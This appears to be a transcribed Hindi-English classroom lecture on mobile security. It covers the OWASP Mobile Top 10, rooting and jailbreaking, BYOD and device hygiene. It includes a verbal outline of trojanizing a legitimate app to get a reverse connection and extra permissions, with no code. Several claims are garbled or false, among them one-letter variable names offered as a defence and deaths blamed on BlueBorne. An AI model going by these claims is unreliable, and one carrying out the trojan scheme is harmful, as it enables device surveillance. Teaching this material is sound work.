start recording. Yeah. First one we have is weak server side controls. वीक सर्वर साइड का मतलब क्या है? आप यहाँ से कोई रिक्वेस्ट भेज रहे हो सर्वर साइड पे, मतलब आपका एप्लीकेशन है वो सिंपल वेब इंटरफेस यूज कर रहा है, एक क्लाइंट से रिक्वेस्ट आ रही है सर्वर की तरफ। अगर वहाँ सर्वर पे रिक्वेस्ट प्रॉपर्ली ऑथेंटिकेट नहीं हो रही है, तो सर्वर पे प्रॉपर्ली कंट्रोल्स नहीं, प्रॉपर्ली चेक्स नहीं इम्प्लीमेंट किए गए हैं, उसको हम बोलते हैं वीक सर्वर साइड कंट्रोल्स, राइट। वहाँ पे डिफॉल्ट ऑथेंटिकेशन चल रहा है, डिफॉल्ट पोर्ट्स चल रहे हैं, पोर्ट्स के लिए प्रॉपर्ली कॉन्फ़िगरेशन नहीं है, पोर्ट्स के ऊपर सिक्योरिटी नहीं लगा रखी, जो भी चीजें सर्वर साइड पे होनी चाहिए वो सब। इट्स ऑल अबाउट वीक सर्वर साइड कंट्रोल। सर्वर पे जो आप सिक्योरिटी चेक्स लगा सकते हो वो प्रॉपर्ली इंप्लीमेंट नहीं किए गए वहाँ पे, राइट। आफ्टर वीक सर्वर साइड कंट्रोल वी हैव इनसिक्योर डेटा स्टोरेज। आपकी जो मोबाइल एप्लीकेशन डेटा प्लेन टेक्स्ट में स्टोर कर दी है, ठीक है, जो डेटा वो स्टोर करे वो प्लेन टेक्स्ट में है, उसके ऊपर एन्क्रिप्शन नहीं लगाया, तो उसके ऊपर प्रॉपर एनकोडिंग परफॉर्म नहीं की गई है, वो हमारा सेकंड कैटेगरी में आता है। वी कॉल इट इनसिक्योर डेटा स्टोरेज। तो आपका डेटा प्लेन टेक्स्ट में स्टोर हो रहा है तो। आफ्टर दिस वीक डेटा स्टोरेज वी हैव इनसफिशिएंट ट्रांसपोर्ट लेयर प्रोटेक्शन। इट्स ऑल अबाउट द डेटा इन ट्रांसिट स्टेट। आप जो डेटा ट्रांसमिट करते हो बिटवीन मशीन ए मशीन बी, डेटा जो फ्लो हो रहा है मशीन ए से मशीन बी के बीच में, अगर वो प्लेन टेक्स्ट में फ्लो हो रहा है, ट्रांसमिशन प्लेन टेक्स्ट में हो रहा है, वहाँ पे प्रॉपर एन्क्रिप्शन नहीं लगाया गया, at that time you can categorize in insufficient transport layer protection, right? After this we have unintended data leakage. अब आप नहीं चाहते कि डेटा लीक हो, तब भी डेटा लीक हो रहा है, किसी भी तरीके से हो, आपने सिंपल कोड में कुछ डाल दिया हो या फिर ट्रांसमिशन आपका इनसिक्योर हो, बट अनइंटेंशनली आपका डेटा लीक हो रहा है किसी भी तरीके से, वो आता है आपका इसके अंदर। ऐसा नहीं है कि वो सिर्फ इन्हीं के थ्रू हो सकता है, ट्रांसमिशन के थ्रू हो सकता है, वो कोई क्लाइंट साइड कोड के थ्रू हो सकता है। I'll explain you कि हम कैसे एक एप्लीकेशन का कोड देख सकते हैं, प्रॉपर जावा कोड कैसे देखना है, उसका सोर्स कोड। I'll explain you, right? तो अनइंटेंडेड डाटा लीकेज इज ऑल अबाउट कि आप अनइंटेंशनली डाटा आपका लीक हो रहा है एप्लीकेशन के थ्रू, हो सकता है वो सर्वर साइड के कंट्रोल्स की वजह से हो रहा हो, डेटा स्टोरेज की वजह से हो रहा हो, सफिशिएंट ट्रांसमिशन मतलब इनसिक्योर ट्रांसमिशन की वजह से हो रहा हो, क्लाइंट साइड कोड की वजह से हो रहा हो, लॉग्स की वजह से हो रहा हो, कुछ भी हो सकता है वहाँ पे, और द मेन पॉइंट इज अनइंटेंशनली आपका डाटा लीक हो रहा है। आफ्टर दिस पुअर ऑथराइजेशन एंड ऑथेंटिकेशन। इट मीन्स आपने जब लॉगिन आईडी पासवर्ड लगाया वहाँ पे, ठीक है, हम एंड्रॉइड में यूज करते हैं एसक्यूएलाइट, लाइट बेस्ड वर्जन है एसक्यूएल का ही, सिंपल ये भी एसक्यूएल आइट बोलते हैं इसको, एसक्यूएल आईटी, राइट। आपने अगर इसके ऊपर प्रॉपर चेक्स नहीं लगाए कि कौन सी क्वेरी को पार्स करे, कौन सी क्वेरी प्रोसेस नहीं करेगा वो, और आपका जो यूजर है वो किसी तरीके से ऑथेंटिकेशन को बाईपास कर पाता है, दैट काइंड ऑफ थिंग, या फिर वो एक नॉर्मल यूजर प्रिविलेजेस, एक हायर यूजर एक एडमिन प्रिविलेजेस ले पाता है वहां से, उसके प्रिविलेज एस्केलेशन कर पाता है वो आती हैं दोनों ही चीजें अबाउट ऑथराइजेशन एंड ऑथेंटिकेशन। ऑथराइजेशन इज ऑल अबाउट कौन सी परमिशंस अलोकेट हैं, ऑथेंटिकेशन इज ऑल अबाउट यूजर नेम पासवर्ड से कैसे ऑथेंटिक कर, मतलब कैसे ऑथेंटिकेट करना है यूजर को, राइट। दोनों में डिफरेंस क्लियर है, व्हाट इज ऑथेंटिकेशन, व्हाट इज ऑथराइजेशन। ऑथेंटिकेशन इज ऑल अबाउट वेरीफाइंग द क्रेडेंशियल्स, लाइक यूजर नेम पासवर्ड आप वेरीफाई करते हैं। ऑथराइजेशन इज ऑल अबाउट की परमिशंस किस किस चीज की हैं यूजर के पास, राइट। आफ्टर दिस वी हैव ब्लॉकिंग क्रिप्टोग्राफी, कि आप जो क्रिप्टोग्राफिक एल्गोरिथम यूज कर रहे हो एनक्रिप्शन के लिए, एनकोडिंग के लिए, हैशिंग के लिए या फिर सर्टिफिकेट के लिए, आप जो एल्गोरिथम्स यूज कर रहे हो वो पुराने एनक्रिप्शन, पुराने एल्गोरिथम्स हैं, वो जनरली यूज नहीं होते, उनको आप इजीली ब्रेक कर सकते हो, ठीक है। आप जो क्रिप्टोग्राफिक एल्गोरिथम यूज कर रहे हो वो इतने कमजोर हैं कि आप उनको इजीली ब्रेक कर पाओगे। दैट्स ऑल अबाउट ब्लॉकिंग क्रिप्टोग्राफी। अदर देन दिस क्लाइंट साइड इंजेक्शन भी है। आप अगर क्लाइंट साइड पे कोई कमांड एग्जीक्यूट कर पाते हो पैरामीटर्स के, इट कुड बी एसक्यूएल इंजेक्शन, इट कुड बी ओएस इंजेक्शन, इट कुड बी एनी काइंड ऑफ इंजेक्शन, आप अगर क्लाइंट साइड पे कमांड एग्जीक्यूट कर पाते हो, दैट्स ऑल अबाउट क्लाइंट साइड इंजेक्शन, राइट। आफ्टर दिस क्लाइंट साइड इंजेक्शन सिक्योरिटी डिसीजंस वाया अनट्रस्टेड इनपुट्स। अगर आपका यूजर इनपुट फील्ड्स के थ्रू एप्लीकेशन की सिक्योरिटी को मॉडिफाई कर पा रहा है, अगर आपका यूजर
इनपुट फील्ड्स के थ्रू कोई क्वेरी डालते हैं, यूजर की सिक्योरिटी, एप्लीकेशन की सिक्योरिटी को मॉडिफाई कर पा रहे हैं. दैट्स Okay. अबाउट सिक्योरिटी डिसीजंस वाया अनट्रस्टेड इनपुट. Okay, sir. राइट. आफ्टर दिस वी हैव इम्प्रॉपर सेशन हैंडलिंग. ये वेब के बाद जो मैं पढ़ा था, वेब में सेम ही चीजें हैं. आपका सेशन अगर प्रॉपरली हैंडल नहीं हो रहा है मोबाइल एप्लीकेशंस के लिए, तो वो सब आता है इसके अंडर. Okay. इनसिक्योर सेशन हैंडलिंग, इम्प्रॉपर सेशन हैंडलिंग. राइट. एट लास्ट वी हैव लैक ऑफ बाइनरी प्रोटेक्शन. ये आपका जो डाटा प्रोसेस हो रहा है, एक याद है हमने वेब में पढ़ा था इनसिक्योर डिसीरियलाइजेशन, याद है? इसमें आपका जावा का कोड प्रोसेस हो रहा था सर्वर साइड पे. Yes, sir. Yeah. इसमें आपका बाइनरी कोड प्रोसेस होता है. इन दिस 10th वन, लैक ऑफ बाइनरी प्रोटेक्शन. आप अगर बाइनरी डाटा आप अगर बाइनरी डाटा डायरेक्ट प्रोसेस कर पा रहे हो, जो कि एक पेलोड हो सकता है सिंपल, आप पेलोड को Mm. बाइनरी में कन्वर्ट करो, वो अगर आप प्रोसेस कर पाते हो, ठीक है, एप्लीकेशन के थ्रू, दैट्स ऑल अबाउट लैक ऑफ बाइनरी प्रोटेक्शन. Okay, sir. After this OWASP top 10 2014, let's start with OWASP top 10 2016. First one is improper platform usage. मतलब आप अभी एप्लीकेशन बना रहे हो, लेटेस्ट एंड्रॉइड वर्जन है आपका एंड्रॉइड वर्जन 11, ठीक है. Okay. आपने सपोर्ट कर दिया एंड्रॉइड वर्जन 4.4 तक, ठीक है. मैं किटकैट तक को सपोर्ट करता हूँ कि जो मोबाइल किटकैट अभी रन कर रहे हैं वो भी इसको डाउनलोड कर सकते हैं, इसको यूज कर सकते हैं. मतलब Oh, जो प्लेटफॉर्म आपने चूज किया है वो प्रॉपरली सिक्योर नहीं है. राइट. okay. दैट्स अबाउट improper platform usage, misuse of Okay. platform features or failure to use platform security controls. Right. Second one we have is insecure data storage. सेम चीज है कि आपका जो डेटा स्टोर हो रहा है क्लाइंट साइड पे वो प्रॉपरली एनक्रिप्टेड फॉर्म में नहीं है. यूजर उसको इजीली देख सकता है. राइट. प्लेन टेक्स्ट पर डेटा स्टोर हो रहा है. Yes. आफ्टर दिस वन वी हैव इनसिक्योर कम्युनिकेशन. जो डेटा ट्रांसमिट हो रहा है मशीन ए से मशीन बी के बीच में, वो एनक्रिप्टेड नहीं है. प्लेन टेक्स्ट डाटा ट्रांसमिट हो रहा है, इजीली कोई बंदा स्निपिंग के थ्रू या फिर एमआईटीएम के थ्रू उसको देख सकता है. राइट. आफ्टर Yes, sir. कम्युनिकेशन पार्ट वी हैव इनसिक्योर ऑथेंटिकेशन. कि आपका जो यूजर नेम पासवर्ड है वो प्रॉपरली ऑथेंटिकेट नहीं कर रहे आप, तो यूजर उसको इजीली बाईपास कर पा रहा है. दैट्स अबाउट इनसिक्योर ऑथेंटिकेशन. अदर दिस वी हैव इनसफिशिएंट क्रिप्टोग्राफी. कि आप जो क्रिप्टोग्राफी का एल्गोरिथम चूज कर रहे हो ये ऑलमोस्ट काफी हद तक सेम ही है. कुछ चीजें अलग है, बस काफी हद तक सेम ही है. यहाँ पे 2014 Yes, sir. 2016 दोनों में काफी चीजें सेम ही है. तो इनसिक्योर क्रिप्टोग्राफी में आप जो एल्गोरिथम यूज कर रहे हो क्रिप्टोग्राफी, वो काफी मतलब सिक्योर नहीं है. वो फैब्रिकेट हो चुके हैं, उनको जनरली यूज नहीं करते, वो सिक्योर नहीं है, उनकी क्रैक्स अवेलेबल हैं, उनको आप इजीली ब्रेक कर सकते हो. तो आफ्टर क्रिप्टोग्राफी वी हैव इनसिक्योर ऑथराइजेशन. कि आपका यूजर प्रिविलेज एस्केलेट कर पा रहा है, एक नॉर्मल यूजर से एडमिन लेवल पे जा सकता है, फिर किसी और यूजर की एक्सेस ले सकता है. वो उसके प्रॉपर परमिशन सेट नहीं है एप्लीकेशन के ऊपर. राइट. इट कुड बी एप्लीकेशन, इट कुड बी मोबाइल ऑपरेटिंग सिस्टम, दोनों की बात चल रही है यहाँ पे. राइट. सो प्रिविलेज एस्केलेशन का पार्ट आता है आपके इसके अंदर, इनसिक्योर ऑथराइजेशन के अंदर. आफ्टर दिस वन वी हैव क्लाइंट कोड क्वालिटी. आपने जो कोड लिखा है एप्लीकेशन का, अगर Okay. कोई भी अटैकर, कोई भी पर्सन उसको इजीली रिवर्स इंजीनियर करके इजीली कोड को एनालाइज कर सकता है, उसको प्रॉपर फंक्शनैलिटी समझ सकता है, और देन उसके लिए पेलोड लिख सकता है. दैट्स ऑल अबाउट क्लाइंट कोड क्वालिटी. आपने जो कोड लिखा था वो अच्छा नहीं था. कोड की क्वालिटी, आपने सिंपल फंक्शन यूज किए, नॉर्मल यूज किया है आपने, इसके अंदर वेरिएबल्स के नेम उसकी वैल्यूज को इजीली डिफाइन कर रहे हैं. तो मैं बात करूँ किसी फ्लिपकार्ट एप्लीकेशन की ले लेते हैं अभी के लिए. सपोज फ्लिपकार्ट में आपकी जो अमाउंट आती है, ठीक है, आपने उसके लिए वेरिएबल लिया अमाउंट नाम से, Okay. क्वांटिटी के लिए आपने लिया क्वांटिटी. Mm. राइट. तो इस टाइप के वेरिएबल नेम्स यूज नहीं होने चाहिए. ये ऐसा नाम यूज करो, फिर सिंगल या फिर डबल कैरेक्टर्स यूज करो ओनली, जिससे Yes, आपकी sir. वैल्यू प्रिडिक्ट ना हो. राइट. वेरिएबल नेम्स वगैरह जो कि क्लाइंट कोड के अंदर आते हैं, जो अपने कोड लिखा है वो कितनी क्वालिटी, उसके अंदर क्वालिटी कितनी है, वो इजीली एनालाइज कर सकता है कोई भी, या फिर नहीं कर सकता. राइट. आफ्टर दिस वी हैव कोड टेम्परिंग. क्लाइंट कोड क्वालिटी के अंडर ही आता है ये भी, कि आप कोड के अंदर मॉडिफिकेशन कर सकते हो या नहीं कर पा रहे. दैट्स ऑल अबाउट. एक चीज और आती है कोड टेम्परिंग के अंदर. आपने जब
एप्लीकेशन को बिल्ड किया, ठीक है, तो अपने उसके अंदर एक हैश वैल्यू डालते हैं जनरली हम, कि अगर कोड के अंदर कोई भी टेम्पर किया जाता है तो आप उसका हैश दोबारा कैलकुलेट करो, एप्लीकेशन को रन करने से पहले उसका हैश कैलकुलेट करो, और जो मेरा पुराना हैश था उससे मैच करो। पुराना हैश किसने डाला था? एडमिन ने, जो डेवलपर था उसने अपना हैश डाला है, ठीक है। Okay. अगर मॉडिफिकेशन के बाद वो हैश मैच हो जाता है तो आपकी जो एप्लीकेशन है वो रन होगी। अगर वो हैश मैच नहीं होता है तो आपकी एप्लीकेशन वहीं की वहीं टर्मिनेट हो जाएगी, वो एग्जीक्यूट ही नहीं होगी, राइट। कोड टेम्परिंग में Okay, sir. दोनों ही चीजें आती हैं, एक तो कोड के अंदर मॉडिफिकेशन करना, और दूसरा उसकी हैश वैल्यू को मैच करना पुराने हैश से, राइट। लास्ट वन वी हैव इज रिवर्स इंजीनियरिंग, कि आपने जो एप्लीकेशन दी है उसको कोई भी इजीली रिवर्स इंजीनियर कर पा रहा है, उसका कोड एनालाइज कर पा रहा है, उसके अंदर मॉडिफिकेशन कर पा रहा है। दैट्स अबाउट सिंपल रिवर्स इंजीनियरिंग। आप जब Okay, रिवर्स sir. इंजीनियरिंग करते हो तो दो वैल्यूज मिलती हैं, इट डिपेंड्स कि आप कौन से टूल से रिवर्स इंजीनियरिंग कर रहे हो उसको। आपको सिंपल जावा कोड चाहिए, आपको माली कोड चाहिए, दोनों ही मिल सकते हैं आपको। इट डिपेंड्स कि आपको कौन सा चाहिए, Okay. राइट। अदर देन दिस ये एक्सटर्नल फंक्शंस, मतलब जो फंक्शंस आप नहीं चाहते कि किसी और को मिले यूज के लिए, दैट वी आर दैट वी कैटेगराइज अंडर एक्सटर्नल फंक्शनैलिटीज, कि वो फंक्शंस आप नहीं चाहते कि किसी और किसी नॉर्मल यूजर को मिले, बट वो मिल रहे हैं वहाँ पे। So that's about internal development security controls that are not intended to be released into a production environment. जो फंक्शंस आपने अपने तक सीमित रखने थे, तो फंक्शनैलिटीज आपको नॉर्मल यूजर को नहीं देनी चाहिए, बट वो मिल रही है यूजर को, Okay. ठीक है। उन फंक्शंस को हम कैटेगराइज करते हैं इसके अंडर, एक्सटर्नल फंक्शनैलिटीज के अंदर, Okay, sir. राइट। आफ्टर दिस वी हैव सम अटैक वेक्टर्स। फर्स्ट वन वाज बेसिक थ्रेट्स, जो कि कौन कौन से थ्रेट हो सकते हैं एप्लीकेशंस के लिए, मोबाइल के लिए। फर्स्ट वन वाज malware और रूटकिट, कि आपने malware डिजाइन किया फिर उसके लिए रूटकिट डिजाइन किया, वो एक सिंपल थ्रेट है एप्लीकेशंस के लिए। सेकंड वन इज डाटा लॉस, कोई थर्ड पार्टी एप्लीकेशन ले लेते हैं अभी के लिए, कोई थर्ड पार्टी एप्लीकेशन और डाटा स्टील कर पा रही है आपके मोबाइल से डाटा स्टील कर पा रही है, राइट। दैट्स Okay. अबाउट मोबाइल लॉस और डाटा लॉस। एंड लास्ट वन वी हैव डेटा टेम्परिंग, कि आपका जो डेटा है वो मॉडिफाई हो रहा है किसी थर्ड पार्टी एप्लीकेशन के थ्रू। जो मैं बात करूँ मोबाइल एप्लीकेशन की, उसमें सबसे इंपॉर्टेंट चीज आती है परमिशंस, राइट। तो जब भी कोई एप्लीकेशन इंस्टॉल करो उसकी परमिशन हमेशा वेरीफाई कर लेना, कि कौन सी परमिशन किस चीज की परमिशन वो मांग रही है, राइट। अगर मैं आपको एग्जांपल दूं, तो आपने इंस्टॉल किया सपोज टेलीग्राम, Okay. टेलीग्राम को छोड़ते हैं व्हाट्सएप ले लेते हैं अभी के लिए, व्हाट्सएप, राइट। Mm. आपने परमिशन दी व्हाट्सएप को कैमरे की, स्टोरेज की, कॉन्टेक्ट की, माइक की, चार तो जनरली मांगता है ये, Yes. राइट। आपने एक बार परमिशन ग्रांट की उनको, Mm. एक बार परमिशन ग्रांट करने के बाद जब भी आपका मोबाइल डाटा ऑन होगा, वो आपसे बिना पूछे आपके ये चारों रिसोर्सेज को यूज कर सकता है, बिना पूछे, दोबारा परमिशन नहीं मांगेगा वो, किसी भी टाइम जब चाहे तब। Okay. एज अ टैकर व्हाट आई कैन डू, मुझे क्या करना है, सिंपल एप्लीकेशन डिजाइन करनी है, एक फेक एप्लीकेशन जो परमिशंस मांगती हो, सिंपल। Okay. मैं कोई कोड मॉडिफाई कर दूंगा जिसके थ्रू मुझे एक सिंपल रिवर्स कनेक्शन मिल जाए, और परमिशंस को मॉडिफाई कर दूंगा कि सारी परमिशंस मांगे। एक कोई लेजिटिमेट एप्लीकेशन मान लो, लाइक कोई भी गेम ले लेते हैं, कैंडी क्रश ले लेते हैं अभी के लिए, कि आपने कैंडी क्रश को रिवर्स इंजीनियर किया, कोड के अंदर टेम्परिंग की, जिससे आपको रिवर्स कनेक्शन मिल रहा है आपके सर्वर पे, आपके मशीन के ऊपर रिवर्स कनेक्शन मिल रहा है। आपने उसकी परमिशंस मॉडिफाई की, जो सिर्फ स्टोरेज की जगह आपसे कैमरा पूछेगा, कॉन्टेक्स्ट पूछेगा, आपसे माइक मांगेगा। आपने परमिशंस मॉडिफाई कर दी और कोड को मॉडिफाई कर दिया फॉर रिवर्स कनेक्शन, आपने तो कर दिया एग्जीक्यूट। आप जब भी एप्लीकेशन को स्टार्ट करोगे एक बार फर्स्ट टाइम, परमिशंस ग्रांट करोगे आप, Yes, sir. आपने जैसे ही परमिशंस ग्रांट की, आपके अटैकर को वैसे ही रिवर्स कनेक्शन मिल जाएगा, ठीक है। अटैकर जब चाहे तब आपके कोई भी रिसोर्स को यूज कर सकता है, जब चाहे तब आपके माइक को यूज कर सकता है, जब चाहे तब आपके फोन से सेल्फी ले सकता है, कैमरा यूज कर सकता है वो, तो जब Okay. चाहे तब आपके स्टोरेज कोई भी फाइल फैच कर सकता है। सबसे इम्पोर्टेंट चीज है परमिशंस, परमिशंस हमेशा ध्यान से देनी चाहिए, Okay, sir. राइट। अदर देन दिस वी हैव ओएस सैंडबॉक्सिंग। तो सैंडबॉक्स का आई होप आपको आइडिया होगा ऑलरेडी व्हाट इज सैंडबॉक्स।
किया है सैंडबॉक्स का? No, sir. ओके, तो अगर सिंपल एग्जांपल दूं तो सैंडबॉक्स एक हिंदी में समझ लेते हैं, सिंपल मिट्टी का ढेर समझते हो? Yes, sir. तो मिट्टी के ढेर में कोई ड्राइंग बनाई, उसके ऊपर हाथ फेर दिया, वो प्लेन हो जाता है, सिंपल एज इट इज, कुछ था ही नहीं। Yes, sir. सिंपल चीज है सैंडबॉक्स एनवायरनमेंट ऑपरेटिंग सिस्टम्स के अंदर। ये एक सेपरेट स्पेस आपने रिजर्व करके रखा है आपके एप्लीकेशंस के लिए, कि उसके अंदर जो भी होगा बाहर उसका कोई इफेक्ट नहीं पड़ेगा। हम जो वीएम्स यूज करते हैं, जो वर्चुअल मशीन यूज करते हैं, राइट, उसमें आपकी जो Yes. भी मशीन आप चलाते हो, काली लिनक्स हो गई, विंडोज 10, विंडोज 7, जो भी आप ओएस यूज करते हो, वो वर्चुअल Okay. मशीन्स, VMware हो गया, फिर वर्चुअल बॉक्स हो गया, वो सब के सब सैंडबॉक्स एनवायरनमेंट में काम करते हैं, कि उसके अंदर जो भी होगा उस बाहर कोई असर नहीं होगा उसका, जो भी होगा उसके अंदर ही होगा, राइट। Okay, sir. दैट्स अबाउट सिंपल सैंडबॉक्स एनवायरनमेंट। So after this we have Android and device administrator APIs. तो रूटिंग का आइडिया है? व्हाट इज रूटिंग? No, sir. कोई आइडिया नहीं है इसका. अगर मैं बात करूं लिनक्स ऑपरेटिंग सिस्टम्स की, तो इसमें एक यूजर होता है जिसको हम रूट बोलते हैं, राइट। हाँ. अब मुझे पता है कि मेरा जो एंड्रॉइड है वो लिनक्स बेस्ड है, राइट। Yes. लिनक्स बेस्ड का मतलब क्या है, इसमें एक यूजर होगा जो कि रूट होगा, Okay. आपका एंड्रॉइड लिनक्स बेस्ड ऑपरेटिंग सिस्टम है, ठीक है। तो लिनक्स में एक Okay. रूट यूजर होता है, एक सिंपल नॉर्मल यूजर होता है। Yes, sir. आपकी हर एप्लीकेशन एक अलग से यूजर बनाती है एंड्रॉइड ऑपरेटिंग सिस्टम के अंदर। मैंने व्हाट्सएप इंस्टॉल किया तो व्हाट्सएप के नाम से एक अलग यूजर बनेगा, मैंने फेसबुक इंस्टॉल किया, फेसबुक के नाम से एक अलग यूजर बनेगा। मतलब वो सब रूट के अंडर काम करते हैं, ठीक है। आप अगर अपने मोबाइल को, आप अपने मोबाइल के लिए रूट प्रिविलेजेस चाहते हो, ठीक है, मुझे मेरे मोबाइल के लिए रूट प्रिविलेजेस चाहिए, उसको हम बोलते हैं सिंपल रूटिंग। कि आपने अपने मोबाइल को सिंपल नॉर्मल यूजर से रूट यूजर पे कन्वर्ट किया है, अपने प्रिविलेजेस एस्केलेट किए हैं एक नॉर्मल यूजर से रूट यूजर पे। दैट्स ऑल अबाउट रूटिंग। Okay. रूटिंग इज जस्ट अ प्रोसेस जिसके थ्रू आप प्रोसेस अपने प्रिविलेजेस माइग्रेट करते हो लोअर लेवल टू हायर लेवल। रूटिंग बस वो प्रोसेस है Okay, जिसके sir. थ्रू आप प्रिविलेज एस्केलेट करते हो। Okay. आफ्टर दिस आपके लिनक्स, आपके एंड्रॉइड में वी कॉल इट रूटिंग। अगर मैं बात करूं आईओएस की, तो आईओएस में हम उसको बोलते हैं जेल ब्रेक। दोनों का काम करने का तरीका सेम ही है, दोनों का पर्पस सेम है, दोनों का मतलब सेम है, बट दोनों के नाम डिफरेंट है बस। एंड्रॉइड में उसको रूटिंग बोलते हैं, आईओएस में हम उसको जेल ब्रेकिंग बोल देते हैं, सिंपल थिंग। Okay. तो मेन मोटिव यही है कि आपको एडमिन की प्रिविलेजेस लेने एक तरीके से। देन देयर आर सम टाइप्स ऑफ जेल ब्रेकिंग। फर्स्ट वन वाज, इसको हटा देते हैं अभी के लिए, ये हमारे काम का नहीं है, रख देते हैं, कोई दिक्कत नहीं, आई एक्सप्लेन यू, जस्ट गिव मी 2 मिनट्स। सो देयर आर सम टाइप्स ऑफ जेल ब्रेकिंग। फर्स्ट वन वाज अनटेथर्ड जेल ब्रेकिंग, ठीक है। मतलब आपने उसको रूट किया, राइट, तो Okay. आपको रूट करते टाइम पे वो रिबूट मांगेगा, Hmm. और आपने जो उसको रिबूट किया तो आपका जो जेल ब्रेक था वो परसिस्टेंट रहेगा। आपने सिस्टम को रिबूट किया और आपने रिबूट के लिए मांग रहा है, बस, राइट। Okay, sir. सॉरी, O- अनटेस्टेड में आपसे रिबूट के लिए नहीं पूछता हूँ, दैट्स द थिंग। Okay. ये आया था आपका, तो विंडोज ओएस चलता था, विंडोज 8.1, विंडोज 8, विंडोज 10। Yes, sir. तो विंडोज के फोन भी आए थे, तो विंडोज एंटी कर्नल पे बेस्ड थे, उनमें लिनक्स नहीं था, विंडोज एंटी कर्नल था। हमारा जो विंडोज जो ऑपरेटिंग सिस्टम हम यूज करते हैं विंडोज में हमारे मेन सिस्टम्स में, उनके कर्नल का नाम भी सेम ही है, विंडोज एंटी कर्नल। तो अगर आपसे कोई पूछे कि विंडोज के कर्नल का नाम क्या है, सिंपल विंडोज एंटी कर्नल, राइट। Okay. तो आफ्टर दिस वी हैव ब्लैकबेरी ऑपरेटिंग सिस्टम। ब्लैकबेरी के मोबाइल्स भी आते हैं, उसके पास खुद का ऑपरेटिंग सिस्टम है अपना, जावा बेस्ड ऑपरेटिंग सिस्टम है, और ये उसके मल्टीपल वर्जन हैं, राइट। आफ्टर दिस वी हैव सम Okay. पॉलिसीज। फर्स्ट वन इज ब्रिंग योर ओन डिवाइस।
कंपनीज में जनरली बहुत यूज होता है कि आपका खुद का लैपटॉप लेके आओ, खुद का मोबाइल लेके आओ, वो नहीं यूज करो आप, वो आपको कुछ प्रोवाइड नहीं करेंगे। आपको सारे काम खुद के मोबाइल से ही करने, खुद के लैपटॉप से ही करने। सपोज ब्रिंग योर ओन डिवाइस, आपके खुद के पर्सनल डिवाइसेस आपको यूज करने हैं, राइट। बट वहाँ पे कुछ सिक्योरिटी चेक्स रहते हैं फिर भी। तो फर्स्ट वन वो कि ओएस कौन सा होगा, पासवर्ड पॉलिसीज क्या होंगी, कब पासवर्ड चेंज करना है, कब पासवर्ड एक्सपायर होगा, किस चीज की एक्सेस होगी, किस एम्प्लॉय को एक्सेस होगी, कौन सी एप्लीकेशन अलाउड है, कौन सी एप्लीकेशन अलाउड नहीं है। वो ओके। आपसे कह वो आपको परमिशन तो देते हैं कि आप खुद का लैपटॉप यूज कर सकते हो वहाँ पे, बट कुछ लिमिटेशंस, कुछ बाउंडेशंस भी है वहाँ पे, राइट। ओके डिवाइस में सर। कौन सा ऑपरेटिंग सिस्टम होगा, पासवर्ड पॉलिसीज क्या अप्लाई होंगी, किसको एक्सेस होगी, किस चीज की एक्सेस होगी, या फिर किस रिसोर्स की एक्सेस होगी आपको उसके थ्रू, और एप्लीकेशन कौन से आप इंस्टॉल कर सकते हो उसके अंदर। आपकी जब इंटरनल ऑडिटिंग होती है कंपनीज के अंदर, तब ये चीजें प्रॉपर चेक की जाती हैं, तब इस जगह पर पूरा पूरा ध्यान होता है ऑडिटर का। ओके। आफ्टर दिस वी हैव सम मोबाइल सिक्योरिटी गाइडलाइंस, कि कैसे आप सिक्योर कर सकते हो खुद के मोबाइल डिवाइस को। फर्स्ट वन इज अवॉइड ऑटो अपलोड ऑफ फाइल्स। हमेशा जो आप अपलोड करते हो फाइल्स को, वो ऑथेंटिक जगह पे ही अपलोड करो। लाइक गूगल ड्राइव हो गया, वन ड्राइव हो गया, मेगा पे आप ट्रस्ट कर सकते हो, या फिर उसका भी आता है, एप्पल का iCloud आता है, वहाँ पे अपलोड करो। बट हमेशा ऑथेंटिक ट्रस्टेड क्लाउड पे ही अपलोड करो। ऐसा नहीं कि कहीं पे भी अपलोड हो रहा है आपने उसको अलाउ करके रखा है, राइट। तो फ्री स्टोरेज के चक्कर में अपना डेटा कॉम्प्रोमाइज मत कर लेना। हमेशा ऑथेंटिक जगह पे ही, हमेशा लेजिटिमेट जगह पे ही अपना डाटा अपलोड करो। आफ्टर दिस परफॉर्म सिक्योरिटी असेसमेंट ऑफ एप्लीकेशंस, कि आपकी जो एप्लीकेशन इंस्टॉल्ड है वो किस चीज़ की परमिशंस मांग रही हैं। अगर मैं बात करूँ सैमसंग मोबाइल्स की, तो सेटिंग में इसमें एक ऑप्शन होता है एप्लीकेशंस का, राइट। यू कैन चेक ऑल द एप्लीकेशंस एंड ऑल देयर परमिशंस, जो किस चीज़ की परमिशंस यूज कर रही है बैकग्राउंड पे। आपको लगता है कि ये एप्लीकेशन को इस परमिशन की जरूरत नहीं है, कि कोई एप्लीकेशन है बेवजह मेरा कैमरा यूज कर रही है, उसको जरूरत नहीं है, या फिर एप्लीकेशन को एक बार स्टार्टिंग में रन करने के लिए, स्टार्टिंग में एक बार खुद को आपको ऑथेंटिकेट करने के लिए एक बार एसएमएस की रिक्वायरमेंट्स थी, वो आपके एसएमएस रीड करे, उसको एक बार परमिशन दो, फिर परमिशन उससे वापस भी ले लो, राइट। तो यू कैन परफॉर्म सिक्योरिटी असेसमेंट, कौन से एप्लीकेशन इंस्टॉल्ड और उनके पास परमिशन क्या है। अपना ब्लूटूथ ऑफ रखो, ये सब बेसिक चीजें हैं यहाँ पे। अलाउ ओनली नेसेसरी जीपीएस एनेबल्ड एप्लीकेशंस, कौन सी सर्विस आपकी लोकेशन फैच कर सकती है। अगर मैं आपको बात करूँ, आपके एप्लीकेशंस आपका हर डेटा लेके जाती है, आपकी हर डेटा को फैच कर सकती है। स्क्रीन की रिजोल्यूशन क्या है, मोबाइल नंबर क्या है, बैटरी परसेंटेज क्या है, कितनी देर से वो एक्टिव है, स्क्रीन कितनी देर पहले ऑन हुई थी, फिंगरप्रिंट है या फिर नंबर लॉक है, सब कुछ सर एप्लीकेशन आपके ब्लूटूथ से हर। क्या होता है? ब्लूटूथ पे एक अटैक था, अगर मैं बताऊं आपको, तो ब्लू बॉर्न अटैक हुआ था काफी पॉपुलर। ऐसा नहीं कि ब्लूटूथ पे अटैक नहीं है, ब्लूटूथ पे भी काफी अटैक, इसके बारे में पढ़ना जरूर। ब्लू बॉर्न अटैक ओके सर। बहुत बढ़िया अटैक था ये भी। अननेसेसरी कोई भी चीज हमें अनेबल नहीं रखनी है मोबाइल के अंदर। ओके। मैं चैट पे उसका लिंक शेयर कर रहा हूँ ब्लू बॉर्न अटैक का। ओके सर। काफी पॉपुलर अटैक है ब्लूटूथ के ऊपर ही, और काफी लोगों की जान भी गई थी इसके 